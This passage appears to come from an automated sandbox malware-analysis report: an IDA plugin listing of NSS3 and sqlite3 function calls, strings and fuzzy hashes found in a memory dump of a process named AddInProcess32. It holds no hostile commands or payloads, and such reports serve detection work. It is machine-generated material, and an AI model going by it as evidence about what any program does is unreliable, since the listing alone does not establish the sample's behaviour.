                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                                      • String ID:
                                                                                      • API String ID: 1929101947-0
                                                                                      • Opcode ID: 77b1b2c4f6f66fc0538b9467342f8f91cdff7afa26a5261e3cb9e556789d50a3
                                                                                      • Instruction ID: 88309fea8ca725a133d46389ed8c215b8f58e4e8897c54ef1b7f4319c9599b0b
                                                                                      • Opcode Fuzzy Hash: 77b1b2c4f6f66fc0538b9467342f8f91cdff7afa26a5261e3cb9e556789d50a3
                                                                                      • Instruction Fuzzy Hash: 0401F0321086009ED732476ADC40F867BE5DF857B4F24842EE6DD66E50F772D4448772
                                                                                      APIs
                                                                                        • Part of subcall function 6CC812DB: sqlite3_mprintf.NSS3(INSERT INTO %Q.'%q_content' VALUES(%s),?,?,6CD5A1D0,00000000,00000000,00000000), ref: 6CC81469
                                                                                        • Part of subcall function 6CC812DB: sqlite3_free.NSS3(?,00000000,00000000,000000FF,00000001,?,00000000,00000000,00000000,00000000), ref: 6CC814C8
                                                                                        • Part of subcall function 6CC812DB: sqlite3_bind_parameter_count.NSS3(?,00000000,00000000,00000000), ref: 6CC814EA
                                                                                      • sqlite3_bind_int64.NSS3(?,00000001,?,00000001,00000000,?,?,?), ref: 6CC78E25
                                                                                        • Part of subcall function 6CC6525C: sqlite3_mutex_leave.NSS3(?,?,?,?,?,?,?,?,6CC65257,?,?,?), ref: 6CC65293
                                                                                      • sqlite3_bind_int64.NSS3(?,00000002,?,00000000,?,00000001,?,00000001,00000000,?,?,?), ref: 6CC78E35
                                                                                      • sqlite3_step.NSS3(?,?,00000002,?,00000000,?,00000001,?,00000001,00000000,?,?,?), ref: 6CC78E3D
                                                                                      • sqlite3_reset.NSS3(?,?,?,00000002,?,00000000,?,00000001,?,00000001,00000000,?,?,?), ref: 6CC78E45
                                                                                        • Part of subcall function 6CC6666E: sqlite3_mutex_enter.NSS3(?,?,?,?,6CCA9B01,?,?,?,?,6CC65F40,?), ref: 6CC6667F
                                                                                        • Part of subcall function 6CC6666E: sqlite3_mutex_leave.NSS3(?,?,?,?,?,?,?,?,6CCA9B01,?,?,?,?,6CC65F40,?), ref: 6CC666BC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_bind_int64sqlite3_mutex_leave$sqlite3_bind_parameter_countsqlite3_freesqlite3_mprintfsqlite3_mutex_entersqlite3_resetsqlite3_step
                                                                                      • String ID:
                                                                                      • API String ID: 2418525957-0
                                                                                      • Opcode ID: ca0784e0403a6386f07a823fa8ed2941ee3721555c9a7d18a6a21c0dec8e7dde
                                                                                      • Instruction ID: 164baccdddde840bc179c91233c244ceaea6535e48819cbe3b8017b40dce8a2a
                                                                                      • Opcode Fuzzy Hash: ca0784e0403a6386f07a823fa8ed2941ee3721555c9a7d18a6a21c0dec8e7dde
                                                                                      • Instruction Fuzzy Hash: ECF0AF31200009BBCF051F46DC41DDEBBA6FF44724F10C124FA2CA9E61E732E9609B80
                                                                                      APIs
                                                                                      • sqlite3_bind_int64.NSS3(?,00000002,00000000,?,?,?,00000038,000003FF,?,00000001,00000000,?,?,?,00000038,00000000), ref: 6CC9AFE5
                                                                                      • sqlite3_bind_int64.NSS3(?,00000001,00000000,?,?,?,00000038,00000000,00000038,?,?,?,?,?,00000000,00000000), ref: 6CC9AFC8
                                                                                        • Part of subcall function 6CC6525C: sqlite3_mutex_leave.NSS3(?,?,?,?,?,?,?,?,6CC65257,?,?,?), ref: 6CC65293
                                                                                      • sqlite3_bind_int64.NSS3(?,00000001,00000000,?,?,?,00000038,?,00000038,?,?,?,?,?,00000000,00000000), ref: 6CC9B01B
                                                                                        • Part of subcall function 6CC812DB: sqlite3_mprintf.NSS3(INSERT INTO %Q.'%q_content' VALUES(%s),?,?,6CD5A1D0,00000000,00000000,00000000), ref: 6CC81469
                                                                                        • Part of subcall function 6CC812DB: sqlite3_free.NSS3(?,00000000,00000000,000000FF,00000001,?,00000000,00000000,00000000,00000000), ref: 6CC814C8
                                                                                        • Part of subcall function 6CC812DB: sqlite3_bind_parameter_count.NSS3(?,00000000,00000000,00000000), ref: 6CC814EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_bind_int64$sqlite3_bind_parameter_countsqlite3_freesqlite3_mprintfsqlite3_mutex_leave
                                                                                      • String ID:
                                                                                      • API String ID: 514226063-0
                                                                                      • Opcode ID: 201926e38365902d7b6fbf3eedd569bd0a1da049265fb1cf9d619e2555408fbe
                                                                                      • Instruction ID: 71af8b6a045fb1b09f5681c9ea6852ef4245f6b2395255a0025e9bfab48d6c44
                                                                                      • Opcode Fuzzy Hash: 201926e38365902d7b6fbf3eedd569bd0a1da049265fb1cf9d619e2555408fbe
                                                                                      • Instruction Fuzzy Hash: BE11A9B2840218BBDF129F85CC05EEF3B79EF89725F044055FE146A610F7728E669BA4
                                                                                      APIs
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CD28C5E
                                                                                        • Part of subcall function 6CD18C17: SECOID_FindOIDTag_Util.NSS3(?,?,6CCEAD2B,?,?,6CCDD706,?,?,?,?,6CCDDC0B,?,?), ref: 6CD18C28
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Tag_Util$AlgorithmFind
                                                                                      • String ID:
                                                                                      • API String ID: 944615674-0
                                                                                      • Opcode ID: 61e700716520e60c9801457a49861e16dfa5619f6d571fd92ef9b349aa24157d
                                                                                      • Instruction ID: c597183f20850d7aba77595f880fbc93889821c2e0e732eeccb482f35167744d
                                                                                      • Opcode Fuzzy Hash: 61e700716520e60c9801457a49861e16dfa5619f6d571fd92ef9b349aa24157d
                                                                                      • Instruction Fuzzy Hash: BEF08C7354B409D69B060F3CAE446953B48D7062ACB200213F6A98BE7CDB5EC9E02544
                                                                                      APIs
                                                                                      • PORT_ArenaStrdup_Util.NSS3(00000000,00000000,00000000,?,6CD0B2B9,00000001,00000000), ref: 6CD0B030
                                                                                      • PORT_ArenaStrdup_Util.NSS3(00000000,00000000,00000000,?,6CD0B2B9,00000001,00000000), ref: 6CD0B045
                                                                                      • PORT_ArenaStrdup_Util.NSS3(00000000,00000000,00000000,?,6CD0B2B9,00000001), ref: 6CD0B05A
                                                                                      • NSSUTIL_ArgHasFlag.NSS3(flags,internal,00000001,00000000,00000000,00000000,?,6CD0B2B9,00000001), ref: 6CD0B075
                                                                                      • NSSUTIL_ArgHasFlag.NSS3(flags,FIPS,00000001,flags,internal,00000001,00000000,00000000,00000000,?,6CD0B2B9,00000001), ref: 6CD0B084
                                                                                      • NSSUTIL_ArgHasFlag.NSS3(flags,critical,00000001,flags,FIPS,00000001,flags,internal,00000001,00000000,00000000,00000000,?,6CD0B2B9,00000001), ref: 6CD0B093
                                                                                      • NSSUTIL_ArgGetParamValue.NSS3(slotParams,00000001,flags,critical,00000001,flags,FIPS,00000001,flags,internal,00000001,00000000,00000000,00000000,?,6CD0B2B9), ref: 6CD0B0A1
                                                                                      • NSSUTIL_ArgParseSlotInfo.NSS3(00000000,00000000,00000034,slotParams,00000001,flags,critical,00000001,flags,FIPS,00000001,flags,internal,00000001,00000000,00000000), ref: 6CD0B0AF
                                                                                      • PORT_Free_Util.NSS3(00000000,?,?,?,?,00000000,00000000,00000000,?,6CD0B2B9,00000001), ref: 6CD0B0BF
                                                                                      • NSSUTIL_ArgReadLong.NSS3(trustOrder,00000001,00000032,00000000,?,?,?,?,00000000,00000000,00000000,?,6CD0B2B9,00000001), ref: 6CD0B0D0
                                                                                      • NSSUTIL_ArgReadLong.NSS3(cipherOrder,00000001,00000000,00000000,trustOrder,00000001,00000032,00000000,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B0E0
                                                                                      • NSSUTIL_ArgHasFlag.NSS3(flags,moduleDB,00000001,cipherOrder,00000001,00000000,00000000,trustOrder,00000001,00000032,00000000,?,?,?,?,00000000), ref: 6CD0B0F4
                                                                                      • NSSUTIL_ArgHasFlag.NSS3(flags,moduleDBOnly,00000001,flags,moduleDB,00000001,cipherOrder,00000001,00000000,00000000,trustOrder,00000001,00000032,00000000), ref: 6CD0B103
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Flag$Util$ArenaStrdup_$LongRead$Free_InfoParamParseSlotValue
                                                                                      • String ID: FIPS$cipherOrder$ciphers$critical$defaultModDB$flags$internal$internalKeySlot$moduleDB$moduleDBOnly$skipFirst$slotParams$trustOrder
                                                                                      • API String ID: 1287861584-1805522812
                                                                                      • Opcode ID: 383fa1ced5a47dc1e6941ed5618010f1fbed460752debe3e8517bf161a157846
                                                                                      • Instruction ID: c60f833cdcf7d88c11b5a3c6a8010d5c3b115eec946739bf518a93785a008bdc
                                                                                      • Opcode Fuzzy Hash: 383fa1ced5a47dc1e6941ed5618010f1fbed460752debe3e8517bf161a157846
                                                                                      • Instruction Fuzzy Hash: D441F871504744BBF7206F3A9C88E6B77E8EB81619F50082EF55692EB1FB74D848CA70
                                                                                      APIs
                                                                                      • PR_smprintf.NSS3(6CD51970,?,00000000,?,6CCEE3D9,?,?,?,?,?,?,?,?,?), ref: 6CCEE886
                                                                                      • PR_smprintf.NSS3(%s manufacturerID='%s',00000000,00000000,?,6CCEE3D9,?,?,?,?,?,?,?), ref: 6CCEE8A3
                                                                                      • PR_smprintf_free.NSS3(00000000), ref: 6CCEE8A8
                                                                                      • PR_smprintf.NSS3(%s libraryDescription='%s',00000000,00000000,?,6CCEE3D9,?,?,?,?,?,?), ref: 6CCEE8CA
                                                                                      • PR_smprintf_free.NSS3(00000000), ref: 6CCEE8CF
                                                                                      • PR_smprintf.NSS3(%s cryptoTokenDescription='%s',00000000,00000000,?,6CCEE3D9,?,?,?,?,?), ref: 6CCEE8F1
                                                                                      • PR_smprintf_free.NSS3(00000000), ref: 6CCEE8F6
                                                                                      • PR_smprintf.NSS3(%s dbTokenDescription='%s',00000000,00000000,?,6CCEE3D9,?,?,?,?), ref: 6CCEE918
                                                                                      • PR_smprintf_free.NSS3(00000000), ref: 6CCEE91D
                                                                                      • PR_smprintf.NSS3(%s cryptoSlotDescription='%s',00000000,00000000,?,6CCEE3D9,?,?,?), ref: 6CCEE93F
                                                                                      • PR_smprintf_free.NSS3(00000000), ref: 6CCEE944
                                                                                      • PR_smprintf.NSS3(%s dbSlotDescription='%s',00000000,00000000,?,6CCEE3D9,?,?), ref: 6CCEE962
                                                                                      • PR_smprintf_free.NSS3(00000000), ref: 6CCEE967
                                                                                      • PR_smprintf.NSS3(%s FIPSSlotDescription='%s',00000000,00000000,?,6CCEE3D9,?), ref: 6CCEE985
                                                                                      • PR_smprintf_free.NSS3(00000000), ref: 6CCEE98A
                                                                                      • PR_smprintf.NSS3(%s FIPSTokenDescription='%s',00000000,00000000,?,6CCEE3D9), ref: 6CCEE9A8
                                                                                      • PR_smprintf_free.NSS3(00000000), ref: 6CCEE9AD
                                                                                      • PR_smprintf.NSS3(%s minPS=%d,00000000,6CCEE3D9,?,6CCEE3D9), ref: 6CCEE9C9
                                                                                      • PR_smprintf_free.NSS3(00000000), ref: 6CCEE9CE
                                                                                      Strings
                                                                                      • %s minPS=%d, xrefs: 6CCEE9C4
                                                                                      • %s FIPSTokenDescription='%s', xrefs: 6CCEE9A3
                                                                                      • %s FIPSSlotDescription='%s', xrefs: 6CCEE980
                                                                                      • %s dbSlotDescription='%s', xrefs: 6CCEE95D
                                                                                      • %s cryptoSlotDescription='%s', xrefs: 6CCEE93A
                                                                                      • %s cryptoTokenDescription='%s', xrefs: 6CCEE8EC
                                                                                      • %s dbTokenDescription='%s', xrefs: 6CCEE913
                                                                                      • %s libraryDescription='%s', xrefs: 6CCEE8C5
                                                                                      • %s manufacturerID='%s', xrefs: 6CCEE89E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: R_smprintf$R_smprintf_free
                                                                                      • String ID: %s FIPSSlotDescription='%s'$%s FIPSTokenDescription='%s'$%s cryptoSlotDescription='%s'$%s cryptoTokenDescription='%s'$%s dbSlotDescription='%s'$%s dbTokenDescription='%s'$%s libraryDescription='%s'$%s manufacturerID='%s'$%s minPS=%d
                                                                                      • API String ID: 2737822564-3414793728
                                                                                      • Opcode ID: ea34cd979c174ebe41990b8b9335b9d29a69477c9bb8e81d81ab1e62c8415614
                                                                                      • Instruction ID: 09f68139537cd2fdf82ecd9fb14efecf1cd907733428cbaaf1fb493328b1ee0f
                                                                                      • Opcode Fuzzy Hash: ea34cd979c174ebe41990b8b9335b9d29a69477c9bb8e81d81ab1e62c8415614
                                                                                      • Instruction Fuzzy Hash: 0E41C632401618A7EB112F6A8C48F9B79F9DFC6ADCF2A051DFC2453911E671C810C7E5
                                                                                      APIs
                                                                                      • PR_Malloc.NSS3(00000008), ref: 6CCCCDE3
                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CCCCDF8
                                                                                        • Part of subcall function 6CCD36F3: PR_GetCurrentThread.NSS3(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD36F6
                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CCCCE1D
                                                                                      • CloseHandle.KERNEL32(?), ref: 6CCCD03A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$CloseCurrentHandleMallocThread
                                                                                      • String ID: NSPR_INHERIT_FDS=
                                                                                      • API String ID: 4117263561-2304250122
                                                                                      • Opcode ID: d1adfbae2d832b7bd73b83c771e437bcd97e1de8d6ffd962c84daf61181aeb30
                                                                                      • Instruction ID: c70667837f1f114a936a95028aa5534fb130ecff5c4c03d79a902ac70e9d2c3b
                                                                                      • Opcode Fuzzy Hash: d1adfbae2d832b7bd73b83c771e437bcd97e1de8d6ffd962c84daf61181aeb30
                                                                                      • Instruction Fuzzy Hash: A6918171E41215AFDB10DFA9C880AAEBBB4FF49768F244169E911E7B40EB30E941CB51
                                                                                      APIs
                                                                                      • PR_NewLock.NSS3 ref: 6CCC7DF5
                                                                                        • Part of subcall function 6CCD98DD: PR_Init.NSS3(6CCD9A75,6CCD41E5,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD98E6
                                                                                        • Part of subcall function 6CCD98DD: PR_Calloc.NSS3(00000001,00000084,?,6CCD9A75,6CCD41E5,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD98F3
                                                                                      • PR_GetEnv.NSS3(NSPR_LOG_MODULES), ref: 6CCC7E04
                                                                                        • Part of subcall function 6CCD35DA: PR_Init.NSS3(?,6CCC80C2,NSPR_LOG_MODULES,?), ref: 6CCD35E6
                                                                                        • Part of subcall function 6CCD35DA: PR_Lock.NSS3(052030D0,?,6CCC80C2,NSPR_LOG_MODULES,?), ref: 6CCD35F5
                                                                                        • Part of subcall function 6CCD35DA: PR_Unlock.NSS3(052030D0,00000000,?,6CCC80C2,NSPR_LOG_MODULES,?), ref: 6CCD3612
                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync,?,?,?,?,?), ref: 6CCC7E8C
                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize,?,?,?), ref: 6CCC7EA9
                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp,?), ref: 6CCC7ED5
                                                                                      • PR_SetLogBuffering.NSS3(00004000,?,?), ref: 6CCC7F97
                                                                                      • PR_GetEnvSecure.NSS3(00004000,?,?), ref: 6CCC7FA3
                                                                                      • PR_SetLogFile.NSS3(00000000,?), ref: 6CCC7FB6
                                                                                      • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000,?), ref: 6CCC7FC6
                                                                                      • OutputDebugStringA.KERNEL32(00000000,?), ref: 6CCC7FD4
                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?), ref: 6CCC7FE4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: _stricmp$InitLock$BufferingCallocDebugFileOutputR_smprintfSecureStringUnlock__acrt_iob_func
                                                                                      • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                      • API String ID: 198397025-3526447440
                                                                                      • Opcode ID: 40599b63271b54d178a84feb684f75395c2e438e2824db2e0339c5d1255c5b2b
                                                                                      • Instruction ID: a8ad4892500ab5d715122d5a2d25cd943b127df0659976bff84b41206886e79b
                                                                                      • Opcode Fuzzy Hash: 40599b63271b54d178a84feb684f75395c2e438e2824db2e0339c5d1255c5b2b
                                                                                      • Instruction Fuzzy Hash: D151A072E056099FEB04CFE5C884A9DBBF8FF06358F64052AE415E7A40FB30A505DB51
                                                                                      APIs
                                                                                      • NSSUTIL_ArgStrip.NSS3(00000000,00000000,00000000,00000000,?,6CD0B29A,00000000,00000001,00000000,00000000,6CCEE7F5,?,00000000,00000000,00000000), ref: 6CD1E971
                                                                                      • PL_strncasecmp.NSS3(00000000,library=,00000008,00000000,00000000,00000000,?,6CD0B29A,00000000,00000001,00000000,00000000,6CCEE7F5,?,00000000,00000000), ref: 6CD1E9A4
                                                                                      • PORT_Free_Util.NSS3(00000000,00000000,00000000,00000000,?,?,?,?,6CCEE7F5,00000000,00000000,00000001), ref: 6CD1E9BD
                                                                                      • NSSUTIL_ArgFetchValue.NSS3(-00000008,00000000,00000000,00000000,00000000,?,?,?,?,6CCEE7F5,00000000,00000000,00000001), ref: 6CD1E9C8
                                                                                      • PL_strncasecmp.NSS3(00000000,name=,00000005,00000000,00000000,00000000,?,?,?,?,6CCEE7F5,00000000,00000000,00000001), ref: 6CD1E9DC
                                                                                      • PORT_Free_Util.NSS3(?,?,?,?,00000000,00000000,00000000,?,?,?,?,6CCEE7F5,00000000,00000000,00000001), ref: 6CD1E9F5
                                                                                      • NSSUTIL_ArgFetchValue.NSS3(-00000005,00000000,?,?,?,00000000,00000000,00000000,?,?,?,?,6CCEE7F5,00000000,00000000,00000001), ref: 6CD1EA00
                                                                                      • PL_strncasecmp.NSS3(00000000,parameters=,0000000B,?,?,?,00000000,00000000,00000000,?,?,?,?,6CCEE7F5,00000000,00000000), ref: 6CD1EA14
                                                                                      • PORT_Free_Util.NSS3(?,?,?,?,?,?,?,00000000,00000000,00000000,?,?,?,?,6CCEE7F5,00000000), ref: 6CD1EA2D
                                                                                      • NSSUTIL_ArgFetchValue.NSS3(-0000000B,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,?,?,?,6CCEE7F5), ref: 6CD1EA38
                                                                                      • PL_strncasecmp.NSS3(00000000,nss=,00000004,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD1EA51
                                                                                      • PORT_Free_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD1EA66
                                                                                      • NSSUTIL_ArgFetchValue.NSS3(-00000004,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD1EA71
                                                                                      • PL_strncasecmp.NSS3(00000000,config=,00000007,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD1EA86
                                                                                      • PORT_Free_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD1EA9B
                                                                                      • NSSUTIL_ArgFetchValue.NSS3(-00000007,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CD1EAA6
                                                                                      • NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD1EAB0
                                                                                      • NSSUTIL_ArgStrip.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD1EAB9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: FetchFree_L_strncasecmpUtilValue$Strip$ParameterSkip
                                                                                      • String ID: config=$library=$name=$nss=$parameters=
                                                                                      • API String ID: 235654050-203331871
                                                                                      • Opcode ID: 1ed67beefae7e9cd63b3a2f7ea15fc9f5c44e7bc1f365274798910a071a5e625
                                                                                      • Instruction ID: 10055e385da5b31aae11d574455708dadf9d2c05e12f6108592ff15096b13d4a
                                                                                      • Opcode Fuzzy Hash: 1ed67beefae7e9cd63b3a2f7ea15fc9f5c44e7bc1f365274798910a071a5e625
                                                                                      • Instruction Fuzzy Hash: FE41807240D225AFEB06DF25FC44BDA37E8BF06358F140026EC459AEA0EB359958C7E5
                                                                                      APIs
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,?,00000000), ref: 6CD05F4B
                                                                                        • Part of subcall function 6CD18C17: SECOID_FindOIDTag_Util.NSS3(?,?,6CCEAD2B,?,?,6CCDD706,?,?,?,?,6CCDDC0B,?,?), ref: 6CD18C28
                                                                                      • PK11_AlgtagToMechanism.NSS3(00000000,?,00000000,?,00000000), ref: 6CD05F51
                                                                                        • Part of subcall function 6CD04F1E: SECOID_FindOIDByTag_Util.NSS3(00000000,?,6CCFDE36,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6CD04F24
                                                                                      • PORT_Alloc_Util.NSS3(0000000C,00000000,?,00000000,?,00000000), ref: 6CD05F5A
                                                                                        • Part of subcall function 6CD1C68C: PR_Malloc.NSS3(00000001,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6A6
                                                                                        • Part of subcall function 6CD1C68C: PR_SetError.NSS3(FFFFE013,00000000,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6BA
                                                                                      • PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000), ref: 6CD05F79
                                                                                        • Part of subcall function 6CD1CA68: PR_SetError.NSS3(FFFFE013,00000000,?,6CCE3237,00000800,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?), ref: 6CD1CA7B
                                                                                      • NSS_Get_SEC_OctetStringTemplate_Util.NSS3(00000000,00000000,?,00000000,?,00000000), ref: 6CD05FF5
                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000), ref: 6CD06002
                                                                                      • PORT_Alloc_Util.NSS3(?,?,?,?,?,00000000,?,00000000), ref: 6CD0601E
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,00000000,?,00000000), ref: 6CD06032
                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000000), ref: 6CD06043
                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6CD64518,?,00000000,?,00000000), ref: 6CD0605F
                                                                                      • PORT_Alloc_Util.NSS3(0000000C,?,?,?,?,00000000,?,00000000), ref: 6CD0606D
                                                                                      • PORT_SetError_Util.NSS3(FFFFE004,?,?,?,?,00000000,?,00000000), ref: 6CD0609D
                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,00000000,?,00000000), ref: 6CD060A6
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001,00000000,?,00000000), ref: 6CD060B0
                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6CD64558,?,00000000,?,00000000), ref: 6CD060E7
                                                                                      • PORT_Alloc_Util.NSS3(00000004,?,?,?,?,00000000,?,00000000), ref: 6CD060F5
